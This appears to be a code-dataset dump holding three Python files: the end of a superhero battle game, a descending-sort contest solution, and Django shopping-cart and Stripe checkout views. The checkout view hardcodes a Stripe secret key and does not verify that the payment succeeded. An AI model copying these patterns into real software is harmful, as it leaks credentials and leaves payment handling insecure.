arena.team_one.revive_heroes()\n arena.team_two.revive_heroes()\n\n# if __name__ == \"__main__\":\n# battle_zone = Arena(int(input(\"What is the size of your team?: \")))\n# running = True\n# battle_zone.build_team_one()\n# battle_zone.build_team_two()\n# while(running):\n# print(battle_zone.team_battle())\n# i = input(\"Would you like to play again? (yes/no): \")\n# if( i == \"no\"):\n# running = False\n# else:\n# battle_zone.team_one.revive_heroes()\n# print(battle_zone.team_one.heroes[0].health)\n# battle_zone.team_two.revive_heroes()\n\n# if __name__ == \"__main__\":\n# hero = Hero(\"Super Man\")\n# print(hero.attack())\n# ability = Ability(\"Laser Eyes\", 600)\n# hero.add_ability(ability)\n# print(hero.attack())\n# new_ability = Ability(\"Super Strength\", 1000)\n# hero.add_ability(new_ability)\n# print(hero.attack())\n","sub_path":"super-heroes.py","file_name":"super-heroes.py","file_ext":"py","file_size_in_byte":11414,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"633588257","text":"import sys; readl = sys.stdin.readline\n\nn = int(readl())\nexists = [False for _ in range(2000001)]\nfor _ in range(n):\n num = int(readl())\n exists[1000000 + num] = True\n \n\nfor i in reversed(range(2000001)):\n if exists[i]:\n print(i -1000000)\n","sub_path":"Python/BOJ/정렬/11931.py","file_name":"11931.py","file_ext":"py","file_size_in_byte":248,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"31526834","text":"from django.shortcuts import render\nfrom django.shortcuts import render, redirect, get_object_or_404\nfrom prod_cat_app.models import Products , Category\nfrom .models import Cart ,ShippingAddresses , My_order\nfrom cart.forms import Billing_address_form\nfrom django.views.generic import ListView\nfrom django.views.generic.edit import CreateView\nfrom django.db.models import Sum\nfrom django.views import View\nfrom django.http import HttpResponseRedirect\nimport stripe\nimport datetime\nimport random\n# Create your views here.\n\nclass CartHome(ListView):\n template_name = 'cart.html'\n context_object_name = 'cart_detail'\n def get_queryset(self):\n cart_id = self.request.session.get('cart_id',None)\n cart_obj = Cart.objects.get(id=cart_id)\n print(cart_obj.product.all())\n return cart_obj.product.all()\n def get_context_data(self, **kwargs):# we need to add more data from this view that is why I', using get_context_data\n context = super().get_context_data()\n cart_id = self.request.session.get('cart_id',None)\n cart_obj = Cart.objects.get(id=cart_id)\n #print(self.request.session)\n context['context'] = Category.objects.all()\n context['total'] = cart_obj.product.all().aggregate(Sum('price'))\n return context\n\n\ndef cartadd(request,product_name):\n cart_id = request.session.get('cart_id',None)\n prod_obj = Products.objects.get(name=product_name)\n print('this is product object',prod_obj)\n cart_obj = Cart.objects.get(id=cart_id)\n cart_obj.product.add(prod_obj.id)\n total = cart_obj.product.aggregate(Sum('price'))\n print('the total is ',total)\n cart_obj.total = total['price__sum']\n cart_obj.save()\n return redirect('cart:cart')\n\ndef cart_del_item(request, product_id):\n if request.method == 'POST':\n cart_id = Cart.objects.get(id=request.session.get('cart_id', None))\n product_obj = Products.objects.get(id=product_id)\n product_obj.cart_set.remove(cart_id)\n return redirect('cart:cart')\n else:\n return redirect('cart:cart')\n####### how to add the user after authentication to the shipping address model?????\nclass Checkout(View):\n def get(self,request):\n if request.user.is_authenticated:\n sh_obj = ShippingAddresses.objects.filter(user__email=request.user)\n form = Billing_address_form(initial={'fullname':request.user.firstname + ' ' +request.user.lastname ,\n 'email':request.user.email})\n return render(request,'checkout.html',{'form':form})\n else:\n return redirect('/loginpage/'+'?next=shippingaddress')\n\n\n\n#####still need to make sure the payments is sccessful#####\n def post(self,request):\n stripe.api_key = \"sk_test_Ln325yMLJM96doz28lnlxAIx00vQplbcK4\"\n cart_obj = Cart.objects.get(id=request.session.get('cart_id', None))\n form = Billing_address_form(request.POST)\n print('is form is valid',form.is_valid())\n if form.is_valid():\n shipping_address = ShippingAddresses(user=request.user,cart=cart_obj,\n city= form.cleaned_data['city'] ,\n area=form.cleaned_data['area'],\n address_line=form.cleaned_data['address_line'],\n Pobox=form.cleaned_data['Pobox'])\n shipping_address.save()\n token = request.POST['stripeToken']\n charge = stripe.Charge.create(\n amount=int(cart_obj.total),\n currency='usd',\n description='Purchase Order',\n source=token,)\n My_order_obj = My_order(user=request.user, cart=cart_obj, shipping_details=shipping_address,\n order_id=random.randint(10000,99999),\n order_date=datetime.datetime.now(),order_status=False)\n My_order_obj.save()\n return render(request,'order.html',{'order_id':My_order_obj.order_id})\n else:\n return HttpResponseRedirect('/home/')\n","sub_path":"walladver/cart/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3994,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}